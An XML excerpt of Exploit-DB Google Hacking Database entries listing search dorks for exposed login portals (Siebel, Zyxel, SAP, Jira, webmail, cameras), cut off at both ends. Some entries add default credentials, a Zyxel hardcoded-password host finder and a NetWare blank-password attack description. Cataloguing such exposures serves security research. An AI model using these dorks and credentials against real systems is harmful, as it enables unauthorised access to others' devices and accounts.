<category>Pages Containing Login Portals</category>
<shortDescription>inurl:start.swe?SWECmd</shortDescription>
<textualDescription>This dork is for exposing Siebel login portals. I consider it a serious
flaw as Siebel uses anonymous users and you can actually view content if by
accident responsibilities are assigned to this anonymous user.
</textualDescription>
<query>inurl:start.swe?SWECmd</query>
<querystring>https://www.google.com/search?q=inurl:start.swe?SWECmd</querystring>
<edb></edb>
<date>2020-04-23</date>
<author>Dan Petran</author>
</entry>
<entry>
<id>8227</id>
<link>https://www.exploit-db.com/ghdb/8227</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:tech &quot;login&quot;</shortDescription>
<textualDescription>Google Dork: inurl:tech &quot;login&quot;
# Pages Containing Login Portals
# Date: 11/09/2023
# Exploit Ivan Nizer Gonsalves
</textualDescription>
<query>inurl:tech &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:tech &quot;login&quot;</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Ivan Nizer Gonsalves</author>
</entry>
<entry>
<id>6841</id>
<link>https://www.exploit-db.com/ghdb/6841</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:template.gch &quot;ZTE Corporation.&quot;</shortDescription>
<textualDescription># Google Dork: inurl:template.gch &quot;ZTE Corporation.&quot;
# Date: 18/03/2021
# Exploit Author: Cuma KURT
# Pages Containing Login Portals
Cuma KURT
*Ethical Hacker | İnformation Security Engineer
Istanbul - Turkey
</textualDescription>
<query>inurl:template.gch &quot;ZTE Corporation.&quot;</query>
<querystring>https://www.google.com/search?q=inurl:template.gch &quot;ZTE Corporation.&quot;</querystring>
<edb></edb>
<date>2021-03-19</date>
<author>Cuma KURT</author>
</entry>
<entry>
<id>1028</id>
<link>https://www.exploit-db.com/ghdb/1028</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:textpattern/index.php</shortDescription>
<textualDescription>Login portal for textpattern a CMS/Blogger tool.</textualDescription>
<query>inurl:textpattern/index.php</query>
<querystring>https://www.google.com/search?hl=de&amp;q=inurl%3Atextpattern%2Findex.php&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2005-06-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>3942</id>
<link>https://www.exploit-db.com/ghdb/3942</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:typo3/install/index.php?mode=</shortDescription>
<textualDescription>typo3 install logins
Bruno Schmid</textualDescription>
<query>inurl:typo3/install/index.php?mode=</query>
<querystring>https://www.google.com/search?q=inurl:typo3/install/index.php?mode=</querystring>
<edb></edb>
<date>2014-04-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6797</id>
<link>https://www.exploit-db.com/ghdb/6797</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:ui/login intitle:jfrog</shortDescription>
<textualDescription># Google Dork: inurl:ui/login intitle:jfrog
# Date: 2/8/2020
# Exploit Author: Javier Bernardo
# Homepage: Pages Containing Login Portals
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:ui/login intitle:jfrog</query>
<querystring>https://www.google.com/search?q=inurl:ui/login intitle:jfrog</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>7084</id>
<link>https://www.exploit-db.com/ghdb/7084</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:ui3.htm</shortDescription>
<textualDescription># Google Dork: inurl:ui3.htm
# Various online devices
# Date: 18/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>inurl:ui3.htm</query>
<querystring>https://www.google.com/search?q=inurl:ui3.htm</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>7171</id>
<link>https://www.exploit-db.com/ghdb/7171</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:upload site:doxbin.org ~password</shortDescription>
<textualDescription># Google Dork: inurl:upload site:doxbin.org ~password
# Pages Containing Login Portals
# Date: 04/08/2021
# Exploit Author: Ujas Dhami</textualDescription>
<query>/inurl:upload site:doxbin.org ~password</query>
<querystring>https://www.google.com/search?q=/inurl:upload site:doxbin.org ~password</querystring>
<edb></edb>
<date>2021-09-09</date>
<author>Ujas Dhami</author>
</entry>
<entry>
<id>6170</id>
<link>https://www.exploit-db.com/ghdb/6170</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:userlogin.do</shortDescription>
<textualDescription>Dork:
inurl:userlogin.do
Description: This google dork lists out the various pages containing user
login portals.
Author: Abhinav Porwal
Company: Cyber Defender
LinkedIn: https://www.linkedin.com/in/abhinavporwal6/
</textualDescription>
<query>inurl:userlogin.do</query>
<querystring>https://www.google.com/search?q=inurl:userlogin.do</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6034</id>
<link>https://www.exploit-db.com/ghdb/6034</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:userportal/webpages/myaccount/login.jsp</shortDescription>
<textualDescription>Juicy information (Firewall Login)
Malkit Singh
</textualDescription>
<query>inurl:userportal/webpages/myaccount/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl:userportal/webpages/myaccount/login.jsp</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Malkit Singh</author>
</entry>
<entry>
<id>7132</id>
<link>https://www.exploit-db.com/ghdb/7132</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:users/password/new</shortDescription>
<textualDescription># Google Dork: intitle:&quot;R WebServer&quot;
# Various pages containing forgot password portals
# Date: 23/08/2021
# Exploit Author: Vaibhav Kumar Srivastava
</textualDescription>
<query>inurl:users/password/new</query>
<querystring>https://www.google.com/search?q=inurl:users/password/new</querystring>
<edb></edb>
<date>2021-08-25</date>
<author>Vaibhav Kumar Srivastava</author>
</entry>
<entry>
<id>5353</id>
<link>https://www.exploit-db.com/ghdb/5353</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:user_login.php</shortDescription>
<textualDescription>Login Portals
Mert Yeniay </textualDescription>
<query>inurl:user_login.php</query>
<querystring>https://www.google.com/search?q=inurl:user_login.php</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Mert Yeniay</author>
</entry>
<entry>
<id>6793</id>
<link>https://www.exploit-db.com/ghdb/6793</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:ushell/shells/abap</shortDescription>
<textualDescription># Google Dork: inurl:ushell/shells/abap
# Date: 2/15/2020
# Exploit Author: Javier Bernardo
# Pages Containing Login Portals
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:ushell/shells/abap</query>
<querystring>https://www.google.com/search?q=inurl:ushell/shells/abap</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>8219</id>
<link>https://www.exploit-db.com/ghdb/8219</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:uux.aspx</shortDescription>
<textualDescription># Google Dork: inurl:uux.aspx
# Pages Containing Login Portals
# Date: 28/07/2023
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:uux.aspx</query>
<querystring>https://www.google.com/search?q=inurl:uux.aspx</querystring>
<edb></edb>
<date>2023-07-28</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6562</id>
<link>https://www.exploit-db.com/ghdb/6562</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:VirtualEms/Login.aspx</shortDescription>
<textualDescription># Google Dork: inurl:VirtualEms/Login.aspx
# Pages containing login portals.
# Date: 23/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:VirtualEms/Login.aspx</query>
<querystring>https://www.google.com/search?q=inurl:VirtualEms/Login.aspx</querystring>
<edb></edb>
<date>2020-09-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>883</id>
<link>https://www.exploit-db.com/ghdb/883</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:WCP_USER</shortDescription>
<textualDescription>WebConnect is client-server based software that provides secure browser based emulation to mainframe, midrange and UNIX systems</textualDescription>
<query>inurl:WCP_USER</query>
<querystring>https://www.google.com/search?q=inurl%3AWCP_USER</querystring>
<edb></edb>
<date>2005-03-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6534</id>
<link>https://www.exploit-db.com/ghdb/6534</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:webclient/Login.xhtml</shortDescription>
<textualDescription># Google Dork: inurl:webclient/Login.xhtml
# Login portals (Powered by GoAnywhere).
# Date: 10/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:webclient/Login.xhtml</query>
<querystring>https://www.google.com/search?q=inurl:webclient/Login.xhtml</querystring>
<edb></edb>
<date>2020-09-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6838</id>
<link>https://www.exploit-db.com/ghdb/6838</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:webdynpro/dispatcher</shortDescription>
<textualDescription># Google Dork: inurl:webdynpro/dispatcher
# Date: 3/18/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
</textualDescription>
<query>inurl:webdynpro/dispatcher</query>
<querystring>https://www.google.com/search?q=inurl:webdynpro/dispatcher</querystring>
<edb></edb>
<date>2021-03-19</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>4105</id>
<link>https://www.exploit-db.com/ghdb/4105</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:webgps intitle:&quot;GPS Monitoring System&quot;</shortDescription>
<textualDescription>Login page for GPS monitoring systems.
Author: Manuel Mancera (sinkmanu)
</textualDescription>
<query>inurl:webgps intitle:&quot;GPS Monitoring System&quot;</query>
<querystring>https://www.google.com/search?q=inurl:webgps intitle:&quot;GPS Monitoring System&quot;</querystring>
<edb></edb>
<date>2015-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6751</id>
<link>https://www.exploit-db.com/ghdb/6751</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:weblogin intitle:(&quot;USG20-VPN&quot;|&quot;USG20W-VPN&quot;|USG40|USG40W|USG60|USG60W|USG110|USG210|USG310|USG1100|USG1900|USG2200|&quot;ZyWALL110&quot;|&quot;ZyWALL310&quot;|&quot;ZyWALL1100&quot;|ATP100|ATP100W|ATP200|ATP500|ATP700|ATP800|VPN50|VPN100|VPN300|VPN000|&quot;FLEX&quot;)</shortDescription>
<textualDescription># Google Dork: inurl:weblogin
intitle:(&quot;USG20-VPN&quot;|&quot;USG20W-VPN&quot;|USG40|USG40W|USG60|USG60W|USG110|USG210|USG310|USG1100|USG1900|USG2200|&quot;ZyWALL110&quot;|&quot;ZyWALL310&quot;|&quot;ZyWALL1100&quot;|ATP100|ATP100W|ATP200|ATP500|ATP700|ATP800|VPN50|VPN100|VPN300|VPN000|&quot;FLEX&quot;)
# Zyxel hardcoded password vuln hosts finder
# Date: 1/6/2021
# Exploit Author: Javier Bernardo
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:weblogin intitle:(&quot;USG20-VPN&quot;|&quot;USG20W-VPN&quot;|USG40|USG40W|USG60|USG60W|USG110|USG210|USG310|USG1100|USG1900|USG2200|&quot;ZyWALL110&quot;|&quot;ZyWALL310&quot;|&quot;ZyWALL1100&quot;|ATP100|ATP100W|ATP200|ATP500|ATP700|ATP800|VPN50|VPN100|VPN300|VPN000|&quot;FLEX&quot;)</query>
<querystring>https://www.google.com/search?q=inurl:weblogin intitle:(&quot;USG20-VPN&quot;|&quot;USG20W-VPN&quot;|USG40|USG40W|USG60|USG60W|USG110|USG210|USG310|USG1100|USG1900|USG2200|&quot;ZyWALL110&quot;|&quot;ZyWALL310&quot;|&quot;ZyWALL1100&quot;|ATP100|ATP100W|ATP200|ATP500|ATP700|ATP800|VPN50|VPN100|VPN300|VPN</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6632</id>
<link>https://www.exploit-db.com/ghdb/6632</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:weblogin.cgi?=0</shortDescription>
<textualDescription>#Exploit Title : Displays login portals.
#Google Dork : inurl:weblogin.cgi?=0
#Date : 10/10/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
ReplyForward
</textualDescription>
<query>inurl:weblogin.cgi?=0</query>
<querystring>https://www.google.com/search?q=inurl:weblogin.cgi?=0</querystring>
<edb></edb>
<date>2020-10-21</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6605</id>
<link>https://www.exploit-db.com/ghdb/6605</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:weblogin.cgi?=1</shortDescription>
<textualDescription>#Exploit Title : Displays login portals.
#Google Dork : inurl:weblogin.cgi?=1
#Date : 10/10/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:weblogin.cgi?=1</query>
<querystring>https://www.google.com/search?q=inurl:weblogin.cgi?=1</querystring>
<edb></edb>
<date>2020-10-12</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6519</id>
<link>https://www.exploit-db.com/ghdb/6519</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:weblogin.cgi?mobile=0</shortDescription>
<textualDescription># Google Dork: inurl:weblogin.cgi?mobile=0
# ZyXEL (Unified Security Gateways, Firewalls, VPN, etc) login portals.
# Date: 1/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:weblogin.cgi?mobile=0</query>
<querystring>https://www.google.com/search?q=inurl:weblogin.cgi?mobile=0</querystring>
<edb></edb>
<date>2020-09-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>903</id>
<link>https://www.exploit-db.com/ghdb/903</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:webmail./index.pl &quot;Interface&quot;</shortDescription>
<textualDescription>Webmail system which reveals that the website is hosted by vDeck</textualDescription>
<query>inurl:webmail./index.pl &quot;Interface&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Awebmail.%2Findex.pl+%22Interface%22</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5541</id>
<link>https://www.exploit-db.com/ghdb/5541</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:webmail/src/login.php</shortDescription>
<textualDescription> SquirrelMail - Login portal:
inurl:webmail/src/login.php
Sravan7s
</textualDescription>
<query>inurl:webmail/src/login.php</query>
<querystring>https://www.google.com/search?q=inurl:webmail/src/login.php</querystring>
<edb></edb>
<date>2019-09-17</date>
<author>Sravan7s</author>
</entry>
<entry>
<id>5054</id>
<link>https://www.exploit-db.com/ghdb/5054</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:webman/index.cgi</shortDescription>
<textualDescription>inurl:webman/index.cgi
NAS DiskStation Login portals
~ B15mu7h</textualDescription>
<query>inurl:webman/index.cgi</query>
<querystring>https://www.google.com/search?q=inurl:webman/index.cgi</querystring>
<edb></edb>
<date>2018-12-14</date>
<author>Steph Jensen</author>
</entry>
<entry>
<id>1191</id>
<link>https://www.exploit-db.com/ghdb/1191</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:webvpn.html &quot;login&quot; &quot;Please enter your&quot;</shortDescription>
<textualDescription>The Cisco WebVPN Services Module is a high-speed, integrated Secure Sockets Layer (SSL) VPN services module for Cisco products.</textualDescription>
<query>inurl:webvpn.html &quot;login&quot; &quot;Please enter your&quot;</query>
<querystring>https://www.google.com/search?q=inurl:webvpn.html+%22login%22+%22Please+enter+your%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5292</id>
<link>https://www.exploit-db.com/ghdb/5292</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:wp/wp-login.php</shortDescription>
<textualDescription>Finding login page of wordpress
inurl:wp/wp-login.php
site:*/wp-login.php intitle:&quot;Log In&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:wp/wp-login.php</query>
<querystring>https://www.google.com/search?q=inurl:wp/wp-login.php</querystring>
<edb></edb>
<date>2019-07-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7974</id>
<link>https://www.exploit-db.com/ghdb/7974</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:_admin &quot;login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:_admin &quot;login&quot;
# Category: Pages Containing Login Portals
# Date: 18/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>inurl:_admin &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:_admin &quot;login&quot;</querystring>
<edb></edb>
<date>2022-07-19</date>
<author>s Thakur</author>
</entry>
<entry>
<id>8007</id>
<link>https://www.exploit-db.com/ghdb/8007</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:_admin &quot;login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: inurl:_admin &quot;login.aspx&quot;
# Category: Pages Containing Login Portals
# Date: 25/07/2022
# Exploit Author: MAHIN VM
</textualDescription>
<query>inurl:_admin &quot;login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:_admin &quot;login.aspx&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>MAHIN VM</author>
</entry>
<entry>
<id>5052</id>
<link>https://www.exploit-db.com/ghdb/5052</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:_cpanel/forgotpwd</shortDescription>
<textualDescription>inurl:_cpanel/forgotpwd
discover cpanel login portals for Neto eCommerce suite users.
~ B15mu7h</textualDescription>
<query>inurl:_cpanel/forgotpwd</query>
<querystring>https://www.google.com/search?q=inurl:_cpanel/forgotpwd</querystring>
<edb></edb>
<date>2018-12-05</date>
<author>Steph Jensen</author>
</entry>
<entry>
<id>7123</id>
<link>https://www.exploit-db.com/ghdb/7123</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Jira login intext:v8.3.2</shortDescription>
<textualDescription># Google Dork: Jira login intext:v8.3.2
# Dork can be changed on target base like *Jira login intext:v*7.0.5 , *Jira login intext:v6.0.3*
# Date: 06/08/2021
# Exploit Author: tamimhasan404
</textualDescription>
<query>Jira login intext:v8.3.2</query>
<querystring>https://www.google.com/search?q=Jira login intext:v8.3.2</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>tamimhasan404</author>
</entry>
<entry>
<id>442</id>
<link>https://www.exploit-db.com/ghdb/442</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Login (&quot;Powered by Jetbox One CMS ™&quot; | &quot;Powered by Jetstream © *&quot;)</shortDescription>
<textualDescription>Jetbox is a content management systems (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF wich I think is overrated, but I will mention here:http://www.securityfocus.com/bid/10858/discussion/The file holding the password is called: &quot;http://.../includes/general_settings.inc.php&quot;It does come with default passwords and that is allways a security risk. The administration is available via /admin/Username: admin, Password: admin1 .</textualDescription>
<query>Login (&quot;Powered by Jetbox One CMS ™&quot; | &quot;Powered by Jetstream © *&quot;)</query>
<querystring>https://www.google.com/search?q=Login+(%22Powered+by+Jetbox+One+CMS+%E2%84%A2%22+%7C+%22Powered+by+Jetstream+%C2%A9+*%22)&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2004-08-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4888</id>
<link>https://www.exploit-db.com/ghdb/4888</link>
<category>Pages Containing Login Portals</category>
<shortDescription>nd=m_fundraising_detail &quot;login here&quot;</shortDescription>
<textualDescription>Some fund raising related login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>nd=m_fundraising_detail &quot;login here&quot;</query>
<querystring>https://www.google.com/search?q=nd=m_fundraising_detail &quot;login here&quot;</querystring>
<edb></edb>
<date>2018-07-06</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7088</id>
<link>https://www.exploit-db.com/ghdb/7088</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Network State: Network Ready. Network Channel: intitle:ACEManager</shortDescription>
<textualDescription># Google Dork: Network State: Network Ready. Network Channel: intitle:ACEManager
# Date: 2021-06-28
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>&quot;Network State: Network Ready. Network Channel:&quot; intitle:ACEManager</query>
<querystring>https://www.google.com/search?q=&quot;Network State: Network Ready. Network Channel:&quot; intitle:ACEManager</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>437</id>
<link>https://www.exploit-db.com/ghdb/437</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Novell NetWare intext:&quot;netware management portal version&quot;</shortDescription>
<textualDescription>Netware servers ( v5 and up ) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.After the Google results are displayed, an attacker wil go to the company base web url and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password.</textualDescription>
<query>Novell NetWare intext:&quot;netware management portal version&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;&amp;q=Novell+NetWare+intext%3A%22netware+management+portal+version%22</querystring>
<edb></edb>
<date>2004-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>291</id>
<link>https://www.exploit-db.com/ghdb/291</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Outlook Web Access (a better way)</shortDescription>
<textualDescription>According to Microsoft &quot;Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. &quot; Now, consider for a moment and you will understand why this could be potentially bad.</textualDescription>
<query>inurl:&quot;exchange/logon.asp&quot; OR intitle:&quot;Microsoft Outlook Web Access - Logon&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=active&amp;q=inurl%3A%22exchange%2Flogon.asp%22+OR+intitle%3A%22Microsoft+Outlook+Web+Access+-+Logon%22</querystring>
<edb></edb>
<date>2004-06-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>7212</id>
<link>https://www.exploit-db.com/ghdb/7212</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Pages Containing Login Portals</shortDescription>
<textualDescription>#Google Dork: intitle:&quot;admin login&quot; site:.pk
#Pages Containing Login Portals
#Date: 11/09/2021
#Exploit Author: Bilal Qureshi
</textualDescription>
<query>Pages Containing Login Portals</query>
<querystring>https://www.google.com/search?q=Pages Containing Login Portals</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Bilal Qureshi</author>
</entry>
<entry>
<id>825</id>
<link>https://www.exploit-db.com/ghdb/825</link>
<category>Pages Containing Login Portals</category>
<shortDescription>PhotoPost PHP Upload</shortDescription>
<textualDescription>PhotoPost was designed to help you give your users exactly what they want. Your users will be thrilled to finally be able to upload and display their photos for your entire community to view and discuss, all with no more effort than it takes to post a text message to a forum.Over 3,500 web sites are powered by PhotoPost today. These customers trusted our software to simplify their lives as webmasters, and to meet the needs of their users.</textualDescription>
<query>-Login inurl:photopost/uploadphoto.php</query>
<querystring>https://www.google.com/search?q=-Login+inurl%3Aphotopost%2Fuploadphoto.php</querystring>
<edb></edb>
<date>2005-01-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>824</id>
<link>https://www.exploit-db.com/ghdb/824</link>
<category>Pages Containing Login Portals</category>
<shortDescription>PHPhotoalbum Statistics</shortDescription>
<textualDescription>PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums.</textualDescription>
<query>inurl:PHPhotoalbum/statistics intitle:&quot;PHPhotoalbum - Statistics&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3APHPhotoalbum%2Fstatistics+intitle%3A%22PHPhotoalbum+-+Statistics%22</querystring>
<edb></edb>
<date>2005-01-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>823</id>
<link>https://www.exploit-db.com/ghdb/823</link>
<category>Pages Containing Login Portals</category>
<shortDescription>PHPhotoalbum Upload</shortDescription>
<textualDescription>Homepage: http://www.stoverud.com/PHPhotoalbum/PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums.</textualDescription>
<query>intitle:&quot;PHPhotoalbum - Upload&quot; | inurl:&quot;PHPhotoalbum/upload&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22PHPhotoalbum+-+Upload%22+%7C+inurl%3A%22PHPhotoalbum%2Fupload%22</querystring>
<edb></edb>
<date>2005-01-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>318</id>
<link>https://www.exploit-db.com/ghdb/318</link>
<category>Pages Containing Login Portals</category>
<shortDescription>phpWebMail</shortDescription>
<textualDescription>PhpWebMail is a php webmail system that supports imap or pop3. It has been reported that PHPwebmail 2.3 is vulnerable. The vulnerability allows phpwebmail users to gain access to arbitrary file system by changing the parameters in the URL used for sending mail (send_mail.php). More info at http://eagle.kecapi.com/sec/fd/phpwebmail.html.</textualDescription>
<query>filetype:php login (intitle:phpWebMail|WebMail)</query>
<querystring>https://www.google.com/search?safe=off&amp;q=filetype%3Aphp+login+%28intitle%3AphpWebMail%7CWebMail%29</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1338</id>
<link>https://www.exploit-db.com/ghdb/1338</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Please enter a valid password! inurl:polladmin</shortDescription>
<textualDescription>The PHP Poll Wizard 2 ist a powerful and easy-to-use PHP-Script for creating and managing polls.more generic dork:&quot;Powered by PHP Poll Wizard&quot; | intitle:&quot;php poll wizard&quot;</textualDescription>
<query>Please enter a valid password! inurl:polladmin</query>
<querystring>https://www.google.com/search?q=Please+enter+a+valid+password%21+inurl%3Apolladmin&amp;btnG=H%C4%BEada%C5%A5</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3796</id>
<link>https://www.exploit-db.com/ghdb/3796</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Please-logon &quot;intitle:zarafa webaccess &quot;</shortDescription>
<textualDescription>Zarafa Webaccess logon pages.
Greetings,
Alrik.</textualDescription>
<query>Please-logon &quot;intitle:zarafa webaccess &quot;</query>
<querystring>https://www.google.com/search?q=Please-logon &quot;intitle:zarafa webaccess &quot;</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>372</id>
<link>https://www.exploit-db.com/ghdb/372</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Powered by INDEXU</shortDescription>
<textualDescription>From the sales department: &quot;INDEXU is a portal solution software that allows you to build powerful Web Indexing Sites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to allow you and your members to easily add, organize, and manage your links makes INDEXU the first choice of all webmasters.&quot;(Moderator note: don't believe the marketing talk..)Some of these servers are not protected well enough. It has been reported that on (rare) occosions this page -&gt;http://[indexu server]/recovery_tools/create_admin_user.phpindicates admin login is possible by the appearance of three text lines:Create Administrator LoginDelete old administrator user ....okCreate new administrator user ....okAn attacker can then change the URL tohttp://[target]/admin/index.php and enter:user=adminpass=adminBut that's if you find them..</textualDescription>
<query>+&quot;Powered by INDEXU&quot; inurl:(browse|top_rated|power</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%2B%22Powered+by+INDEXU%22+inurl%3A%28browse%7Ctop_rated%7Cpower_search%7Chot%7Cbrowse%7Ccreate_admin_user%29+filetype%3Aphp&amp;btnG=Sea</querystring>
<edb></edb>
<date>2004-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>5193</id>
<link>https://www.exploit-db.com/ghdb/5193</link>
<category>Pages Containing Login Portals</category>
<shortDescription>qBittorrent - Web UI</shortDescription>
<textualDescription>intitle:&quot;qBittorrent Web UI&quot; inurl:8080
default: admin // adminadmin</textualDescription>
<query>intitle:&quot;qBittorrent Web UI&quot; inurl:8080</query>
<querystring>https://www.google.com?q=intitle:&quot;qBittorrent Web UI&quot; inurl:8080</querystring>
<edb></edb>
<date>2019-04-24</date>
<author>Pancaker</author>
</entry>
<entry>
<id>7779</id>
<link>https://www.exploit-db.com/ghdb/7779</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Re: intitle:&quot;Login&quot; intext:&quot;camera&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; intext:&quot;camera&quot;
# Pages Containing Login Portals
# Date:12/11/2021
# Exploit Author: Naveen Venugopal</textualDescription>
<query>intitle:&quot;Login&quot; intext:&quot;camera&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; intext:&quot;camera&quot;</querystring>
<edb></edb>
<date>2021-11-12</date>
<author>Naveen Venugopal</author>
</entry>
<entry>
<id>8202</id>
<link>https://www.exploit-db.com/ghdb/8202</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;
# Pages Containing Login Portals
# Date:31/05/2023
# Exploit Author: Ishak Hasan Sabbir</textualDescription>
